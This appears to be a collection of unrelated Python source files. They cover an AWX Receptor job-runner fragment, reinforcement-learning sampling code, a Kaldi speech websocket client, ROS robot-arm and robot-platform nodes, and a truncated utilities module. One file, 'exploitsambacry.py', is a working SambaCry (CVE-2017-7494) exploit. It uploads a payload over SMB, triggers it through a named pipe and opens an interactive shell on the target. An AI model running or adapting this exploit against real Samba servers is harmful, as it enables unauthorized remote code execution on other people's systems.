# Which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
# TODO: There should be a more efficient way of getting this information
receptor_work_list = receptor_ctl.simple_command("work list")
detail = receptor_work_list[self.unit_id]['Detail']
state_name = receptor_work_list[self.unit_id]['StateName']
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occured at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local':
self.runner_params['only_transmit_kwargs'] = True
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
work_type = 'kubernetes-runtime-auth'
else:
work_type = 'kubernetes-incluster-auth'
else:
work_type = 'local'
return work_type
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
if hasattr(self, 'unit_id') and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
time.sleep(1)
@property
def pod_definition(self):
if self.task:
ee = self.task.instance.resolve_execution_environment()
else:
ee = get_default_execution_environment()
default_pod_spec = get_default_pod_spec()
default_pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"awx-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
exploitsambacry.py | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
import os
from impacket.dcerpc.v5 import transport
from impacket.smbconnection import *
import sys
import time
import socket
from threading import Thread
class SambaCry:
"""
Sambacry (CVE-2017-7494)
Tested on samba 5.4.9
"""
port = 445
def __init__(self):
pass
@staticmethod
def dce_trigger(dce):
try:
dce.connect()
except SessionError as error:
print "[+] Ocekavana vyjimka od: Samba (SMB SessionError)"
except nmb.NetBIOSError as error:
print " [-] Spojeni ukonceno"
except nmb.NetBIOSTimeout as error:
pass
@staticmethod
def receive_and_print(sock):
try:
while True:
data = sock.recv(8)
if not data:
break
sys.stdout.write(str(data))
except Exception as e:
print "[-] Vyjimka: " + str(e)
@staticmethod
def exploit(target, port, executable, remote_share, remote_path, user=None, password=None, remote_shell_port=None):
"""Samba exploit"""
# Open the connection
try:
smb_client = SMBConnection(target, target, sess_port=port)
except socket.error as error:
print "[-] Chyba spojeni", error.message
return
if user:
try:
if not smb_client.login(user, password):
raise Exception("[-] Chyba autentizace, neplatne uzivatelske jmeno nebo heslo")
else:
print "[i] Autentizace ok, jsme tam !"
except SessionError as error:
print "[-] Chyba spojeni", error.message
return
# Upload the payload module
print "[+] Pripravuji exploit"
executable_name = os.path.basename(executable)
executable_file = open(executable, 'rb')
smb_client.putFile(remote_share, executable_name, executable_file.read)
executable_file.close()
# Trigger the bug in another thread, since it will be locked
trigger_module = r'ncacn_np:%s[\pipe\%s]' % (target, remote_path)
rpc_transport = transport.DCERPCTransportFactory(trigger_module)
dce = rpc_transport.get_dce_rpc()
trigger_thread = Thread(target=SambaCry.dce_trigger, args=(dce,))
trigger_thread.daemon = True
trigger_thread.start()
# Give some time to the exploit to run
time.sleep(2)
# Profit
if not remote_shell_port:
print "[i] Cil napaden, over si to"
return
remote_shell_port = int(remote_shell_port)
print "[+] Exploit trigger bezi v pozadi, kontroluji nas shell"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "[+] Pripojuji se k %s port %s" % (target, str(remote_shell_port))
sock.connect((target, remote_shell_port))
print "[+] Overuji tvuj shell..."
command = "uname -a"
# Receive and print data in another thread
receive_thread = Thread(target=SambaCry.receive_and_print, args=(sock,))
receive_thread.daemon = True
receive_thread.start()
while True:
try:
sock.send(command)
sock.send("\n")
except nmb.NetBIOSError:
break
command = raw_input(">>")
sock.close()
except Exception as e:
print "[-] IO error pripojeni k shellu " + str(e)"
|
agent.py | import multiprocessing
from utils.replay_memory import Memory
from utils.torch import *
import math
import time
import os
import numpy as np
def collect_samples(pid, queue, env, policy, custom_reward,
mean_action, render, running_state, min_batch_size, max_reward, save_render, iter,env_rand):
if pid > 0:
torch.manual_seed(torch.randint(0, 5000, (1,)) * pid)
if hasattr(env, 'np_random'):
env.np_random.seed(env.np_random.randint(5000) * pid)
if hasattr(env, 'env') and hasattr(env.env, 'np_random'):
env.env.np_random.seed(env.env.np_random.randint(5000) * pid)
log = dict()
memory = Memory()
num_steps = 0
total_reward = 0
min_reward = max_reward
max_reward = -max_reward
total_c_reward = 0
min_c_reward = max_reward
max_c_reward = -max_reward
num_episodes = 0
total_e_reward = 0
min_e_reward = max_reward
max_e_reward = -max_reward
if save_render:
if not os.path.exists(f'assets/renders/episode_{iter}'):
os.mkdir(f'assets/renders/episode_{iter}')
while num_steps < min_batch_size:
state = env.reset()
if running_state is not None:
state = running_state(state)
reward_episode = 0
for t in range(10000):
state_var = tensor(state).unsqueeze(0)
with torch.no_grad():
if mean_action:
action = policy(state_var)[0][0].numpy()
else:
action = policy.select_action(state_var)[0].numpy()
action = int(action) if policy.is_disc_action else action.astype(np.float64)
step_heatmap = False
if num_episodes == 0:
step_heatmap = env.heatmap and (render or save_render)
elif render:
step_heatmap = ((num_episodes % render == 0) or save_render) and env.heatmap
next_state, reward, done, _ = env.step(action, step_heatmap=step_heatmap)
reward_episode += reward
total_e_reward += reward
min_e_reward = min(min_e_reward, reward)
max_e_reward = max(max_e_reward, reward)
if not save_render:
if running_state is not None:
next_state = running_state(next_state)
if custom_reward is not None:
discrim_reward = custom_reward(state, action)
reward = discrim_reward + reward
total_c_reward += discrim_reward
min_c_reward = min(min_c_reward, reward)
max_c_reward = max(max_c_reward, reward)
mask = 0 if done else 1
memory.push(state, action, mask, next_state, reward)
if done:
if save_render:
output_file = open(f'assets/renders/episode_{iter}/sample_{num_episodes}.mp4', 'wb')
env.render(output_file=output_file)
if render and num_episodes % render == 0:
env.render()
break
state = next_state
if save_render and num_episodes == 5:
return
# log stats
num_steps += (t + 1)
num_episodes += 1
total_reward += reward_episode
min_reward = min(min_reward, reward_episode)
max_reward = max(max_reward, reward_episode)
log['num_steps'] = num_steps
log['num_episodes'] = num_episodes
log['total_reward'] = total_reward
log['avg_reward'] = total_reward / num_episodes
log['max_reward'] = max_reward
log['min_reward'] = min_reward
log['total_e_reward'] = total_e_reward
log['avg_e_reward'] = total_e_reward / num_steps
log['max_e_reward'] = max_e_reward
log['min_e_reward'] = min_e_reward
if custom_reward is not None:
log['total_c_reward'] = total_c_reward
log['avg_c_reward'] = total_c_reward / num_steps
log['max_c_reward'] = max_c_reward
log['min_c_reward'] = min_c_reward
if queue is not None:
queue.put([pid, memory, log])
else:
return memory, log
def merge_log(log_list):
log = dict()
log['total_reward'] = sum([x['total_reward'] for x in log_list])
log['num_episodes'] = sum([x['num_episodes'] for x in log_list])
log['num_steps'] = sum([x['num_steps'] for x in log_list])
log['avg_reward'] = log['total_reward'] / log['num_episodes']
log['max_reward'] = max([x['max_reward'] for x in log_list])
log['min_reward'] = min([x['min_reward'] for x in log_list])
if 'total_c_reward' in log_list[0]:
log['total_c_reward'] = sum([x['total_c_reward'] for x in log_list])
log['avg_c_reward'] = log['total_c_reward'] / log['num_steps']
log['max_c_reward'] = max([x['max_c_reward'] for x in log_list])
log['min_c_reward'] = min([x['min_c_reward'] for x in log_list])
return log
class Agent:
def __init__(self, env, policy, device, custom_reward=None, value=None, running_state=None, num_threads=1, max_reward = 1e6, env_rand=2.0):
self.env = env
self.policy = policy
self.device = device
self.custom_reward = custom_reward
self.running_state = running_state
self.num_threads = num_threads
self.max_reward = max_reward
self.env_rand = env_rand
self.value = value
def collect_samples(self, min_batch_size, mean_action=False, render=0, multiprocessing=True, save_render = False, iter=None):
log = None
batch = None
t_start = time.time()
to_device(torch.device('cpu'), self.policy)
if multiprocessing:
thread_batch_size = int(math.floor(min_batch_size / self.num_threads))
queue = multiprocessing.Queue()
workers = []
for i in range(self.num_threads-1):
worker_args = (i+1, queue, self.env, self.policy, self.custom_reward, mean_action,
False, self.running_state, thread_batch_size)
workers.append(multiprocessing.Process(target=collect_samples, args=worker_args))
for worker in workers:
worker.start()
memory, log = collect_samples(0, None, self.env, self.policy, self.custom_reward, mean_action,
render, self.running_state, thread_batch_size, self.max_reward, save_render, iter, self.env_rand)
worker_logs = [None] * len(workers)
worker_memories = [None] * len(workers)
for _ in workers:
pid, worker_memory, worker_log = queue.get()
worker_memories[pid - 1] = worker_memory
worker_logs[pid - 1] = worker_log
for worker_memory in worker_memories:
memory.append(worker_memory)
batch = memory.sample()
if self.num_threads > 1:
log_list = [log] + worker_logs
log = merge_log(log_list)
to_device(self.device, self.policy)
t_end = time.time()
log['sample_time'] = t_end - t_start
log['action_mean'] = np.mean(np.vstack(batch.action), axis=0)
log['action_min'] = np.min(np.vstack(batch.action), axis=0)
log['action_max'] = np.max(np.vstack(batch.action), axis=0)
else:
t_start = time.time()
to_device(torch.device('cpu'), self.policy)
if not save_render:
memory, log = collect_samples(0, None, self.env, self.policy, self.custom_reward, mean_action,
render, self.running_state, min_batch_size, self.max_reward, save_render, iter, self.env_rand)
to_device(self.device, self.policy)
t_end = time.time()
batch = memory.sample()
log['sample_time'] = t_end - t_start
log['action_mean'] = np.mean(np.vstack(batch.action), axis=0)
log['action_min'] = np.min(np.vstack(batch.action), axis=0)
log['action_max'] = np.max(np.vstack(batch.action), axis=0)
else:
collect_samples(0, None, self.env, self.policy, self.custom_reward, mean_action,
render, self.running_state, min_batch_size, self.max_reward, save_render, iter, self.env_rand)
return batch, log
|
audio_client.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Benjamin Milde and Jonas Wacker'
import argparse
from ws4py.client.threadedclient import WebSocketClient
import threading
import sys
import urllib
import Queue
import json
import time
import traceback
import os
from mutagen.mp3 import MP3
from bridge import KeywordClient
std_speaker = "You"
def rate_limited(max_per_second):
min_interval = 1.0 / float(max_per_second)
def decorate(func):
last_time_called = [0.0]
def rate_limited_function(*args, **kargs):
elapsed = time.clock() - last_time_called[0]
left_to_wait = min_interval - elapsed
if left_to_wait > 0:
time.sleep(left_to_wait)
ret = func(*args, **kargs)
last_time_called[0] = time.clock()
return ret
return rate_limited_function
return decorate
# Returns an audio file's bitrate and length in seconds if file is in mp3-format.
def get_audio_meta_data(path):
file_extension = os.path.splitext(path)[1] if (isinstance(path, str) and os.path.isfile(path)) else 'none'
meta_data = {'bitrate': 32000 * 8, 'length': 0}
if file_extension == '.mp3':
audio = MP3(path)
meta_data['bitrate'] = audio.info.bitrate
meta_data['length'] = audio.info.length
return meta_data
class KaldiClient(WebSocketClient):
def __init__(self, filename, url, protocols=None, extensions=None, heartbeat_freq=None, byterate=32000,
save_adaptation_state_filename=None, send_adaptation_state_filename=None, keyword_server_url='',
max_sentences=0):
super(KaldiClient, self).__init__(url, protocols, extensions, heartbeat_freq)
self.final_hyps = []
self.fn = filename
self.byterate = byterate
self.final_hyp_queue = Queue.Queue()
self.save_adaptation_state_filename = save_adaptation_state_filename
self.send_adaptation_state_filename = send_adaptation_state_filename
self.keyword_client = KeywordClient(keyword_server_url)
self.keyword_client.reset()
self.send_to_keywordserver = not (keyword_server_url == '')
if self.send_to_keywordserver:
self.keyword_client.addUtterance('', 'You')
self.last_hyp = ''
self.max_sentences = max_sentences
@rate_limited(4)
def send_data(self, data):
self.send(data, binary=True)
def opened(self):
# print "Socket opened!"
def send_data_to_ws():
f = open(self.fn, "rb")
if self.send_adaptation_state_filename is not None:
print >> sys.stderr, "Sending adaptation state from %s" % self.send_adaptation_state_filename
try:
adaptation_state_props = json.load(open(self.send_adaptation_state_filename, "r"))
self.send(json.dumps(dict(adaptation_state=adaptation_state_props)))
except:
e = sys.exc_info()[0]
print >> sys.stderr, "Failed to send adaptation state: ", e
for block in iter(lambda: f.read(self.byterate / 4), ""):
if self.maximum_sentences_reached():
break
self.send_data(block)
print >> sys.stderr, "Audio sent, now sending EOS"
self.send("EOS")
t = threading.Thread(target=send_data_to_ws)
t.start()
# received decoding message from upstream Kaldi server
def received_message(self, m):
if self.maximum_sentences_reached():
return
try:
response = json.loads(str(m))
# print >> sys.stderr, "RESPONSE:", response
# print >> sys.stderr, "JSON was:", m
if response['status'] == 0:
if 'result' in response:
trans = response['result']['hypotheses'][0]['transcript']
if response['result']['final']:
if trans not in ['a.', 'I.', 'i.', 'the.', 'but.', 'one.', 'it.', 'she.']:
self.final_hyps.append(trans)
if self.send_to_keywordserver:
self.keyword_client.replaceLastUtterance(self.last_hyp, trans, std_speaker)
self.keyword_client.completeUtterance(trans, std_speaker)
self.keyword_client.addUtterance('', std_speaker)
self.last_hyp = ''
complete_transcript = '\n'.join(sentence[:-1] for sentence in self.final_hyps)
print u'\r\033[K', trans.replace(u'\n', u'\\n')
else:
if self.send_to_keywordserver:
self.keyword_client.replaceLastUtterance(self.last_hyp, trans, std_speaker)
self.last_hyp = trans
print_trans = trans.replace(u'\n', u'\\n')
print u'\r\033[K', print_trans
if 'adaptation_state' in response:
if self.save_adaptation_state_filename:
print u'Saving adaptation state to %s' % self.save_adaptation_state_filename
with open(self.save_adaptation_state_filename, 'w') as f:
f.write(json.dumps(response['adaptation_state']))
else:
print u'Received error from server (status %d)' % response['status']
if 'message' in response:
print 'Error message:', response['message']
except Exception:
print 'Exception in received_message'
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=10, file=sys.stdout)
def get_full_hyp(self, timeout=60):
return self.final_hyp_queue.get(timeout)
# Returns True if the maximum number of sentences defined by the user have been transcribed.
def maximum_sentences_reached(self):
return self.max_sentences != 0 and len(self.final_hyps) >= self.max_sentences
def closed(self, code, reason=None):
# print "Websocket closed() called"
# print >> sys.stderr
self.final_hyp_queue.put(" ".join(self.final_hyps))
def connect_ws(args):
content_type = args.content_type
if content_type == '' and args.audiofile.endswith(".raw"):
content_type = "audio/x-raw, layout=(string)interleaved, rate=(int)%d, format=(string)S16LE, channels=(int)1"\
% (args.rate / 2)
if args.rate == 0:
meta_data = get_audio_meta_data(args.audiofile)
args.rate = meta_data['bitrate'] / 8
print "No Bitrate provided. Setting Bitrate to: " + str(args.rate)
try:
ws = KaldiClient(args.audiofile, args.uri + '?%s' % (urllib.urlencode([("content-type", content_type)])),
byterate=args.rate, save_adaptation_state_filename=args.save_adaptation_state,
send_adaptation_state_filename=args.send_adaptation_state,
keyword_server_url=args.ambient_uri, max_sentences=args.count)
ws.connect()
while not ws.maximum_sentences_reached():
time.sleep(1)
except KeyboardInterrupt:
ws.close()
result = ws.get_full_hyp()
print result.encode('utf-8')
def main():
parser = argparse.ArgumentParser(description='Command line client for kaldigstserver')
parser.add_argument('-u', '--uri', default="ws://localhost:8100/client/ws/speech", dest="uri",
help="Server websocket URI")
parser.add_argument('-a', '--ambient-uri', default='http://localhost:5000/', dest='ambient_uri',
help='Ambient server websocket URI')
parser.add_argument('-r', '--rate', default=0, dest="rate", type=int,
help="Rate in bytes/sec at which audio should be sent to the server."
"NB! For raw 16-bit audio it must be 2*samplerate!")
parser.add_argument('-n', '--sentence-number', default=0, dest="count", type=int,
help="Maximum number of sentences to transcribe.")
parser.add_argument('--save-adaptation-state', help="Save adaptation state to file")
parser.add_argument('--send-adaptation-state', help="Send adaptation state from file")
parser.add_argument('--content-type', default='',
help="Use the specified content type (empty by default,"
"for raw files the default is audio/x-raw, layout=(string)interleaved,"
"rate=(int)<rate>, format=(string)S16LE, channels=(int)1")
parser.add_argument('audiofile', help="Audio file to be sent to the server")
args = parser.parse_args()
return args
if __name__ == "__main__":
args = main()
connect_ws(args)
|
HiwinRA605_socket_ros_test_20190625195912.py | #!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data,point_data_flag,arm_mode_flag,speed_mode_flag,Socket_sent_flag
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#if Arm_feedback == 0:
if point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True:
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
Socket_sent_flag = True
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line |
smads_endpoints_node.py | #!/usr/bin/env python3
import rospy
import threading
from enum import Enum
from smads_core.client import JackalClient
from smads_core.client import SpotClient
from smads_core.client import RobotClient
from smads_core.interface import RobotSensorInterface
from smads_core.interface import RobotNavigationInterface
class RobotType:
SPOT = 1
JACKAL = 2
platform_map = {
SPOT : SpotClient(),
JACKAL : JackalClient(),
}
class SMADSROS:
def __init__(self, client, sensor_poll_rate, robot_prefix="smads_platform"):
self.client = client
self.robot_prefix = robot_prefix
self.client_mutex = threading.Lock()
self.sensor_interface = RobotSensorInterface(client, self.client_mutex, sensor_poll_rate, robot_prefix)
self.navigation_interface = RobotNavigationInterface(client, self.client_mutex, robot_prefix)
def start(self):
x = threading.Thread(target=self.sensor_interface.start)
y = threading.Thread(target=self.navigation_interface.start)
x.start()
y.start()
rospy.spin()
if __name__ == '__main__':
try:
rospy.init_node('smads_ros_node', anonymous=False)
platform = RobotType.JACKAL
client = RobotType.platform_map[platform]
platorm = rospy.get_param("~platform", 1)
platform_prefix = rospy.get_param("~platform_prefix", "smads_platform")
poll_rate = rospy.get_param("~sensor_poll_rate", 10)
smadsros = SMADSROS(client, poll_rate, platform_prefix)
smadsros.start()
except rospy.ROSInterruptException:
pass
|
utils.py | #!/user/bin/env python
import time
import datetime
import threading
import sys
import os
import re
import signal
import copy
import six
from traceback import print_exception
import logbook
from pystalkd.Beanstalkd import Connection
import anyjson
import tweetsclient
def dict_mget(subject, *keys, **kwargs):
curr = subject
for k in keys:
try:
if k in curr:
curr = curr[k]
else:
return None
except TypeError:
return None
return curr
def replace_highpoints(subject, replacement=u'\ufffd'):
try:
return re.sub(u'[\U00010000-\U0010ffff]', replacement, subject, re.U)
except re.error:
return re.sub(u'[\uD800-\uDBFF][\uDC00-\uDFFF]', replacement, subject, re.U)
def beanstalk(host='localhost', port=11300, watch=None, use=None):
beanstalk = Connection(host=host, port=port)
if use:
beanstalk.use(use)
if watch:
beanstalk.watch(watch)
return beanstalk
def configure_log_handler(application_name, loglevel, output):
if isinstance(loglevel, (str, six.string_types)):
loglevel = getattr(logbook, loglevel.upper())
if not isinstance(loglevel, int):
raise TypeError("configure_log_handler expects loglevel to be either an integer or a string corresponding to an integer attribute of the logbook module.")
if output == 'syslog':
log_handler = logbook.SyslogHandler(
application_name=application_name,
facility='user',
bubble=False,
level=loglevel)
elif output == '-' or not output:
log_handler = logbook.StderrHandler(
level=loglevel,
bubble=False)
else:
log_handler = logbook.FileHandler(
filename=output,
encoding='utf-8',
level=loglevel,
bubble=False)
return log_handler
def run_with_restart(fn, max_restart=0, args=(), kwargs={}):
restartCounter = 0
while True:
try:
return fn(*args, **kwargs)
except AssertionError:
raise
except Exception as e:
logbook.error("Unhandled exception of type {exctype}: {exception}",
exctype=type(e),
exception=str(e))
restartCounter += 1
if max_restart and restartCounter > max_restart:
logbook.critical("Alreadying restarted {nth} times. Exiting.",
nth=restartCounter)
else:
# Sleep longer each time we restart, but no more than 5 minutes
delay = min(restartCounter * 15, 300)
logbook.error("Restarting for {nth} time in {sec} seconds.",
nth=restartCounter,
sec=delay)
time.sleep(delay)
def restart_process(signum, frame):
"""
Replaces the current process with a new process invoked
using the same command line.
"""
os.execl(sys.executable, sys.executable, *sys.argv)
def start_heartbeat_thread(heart):
"""
Triggers a regular heartbeat from a background thread
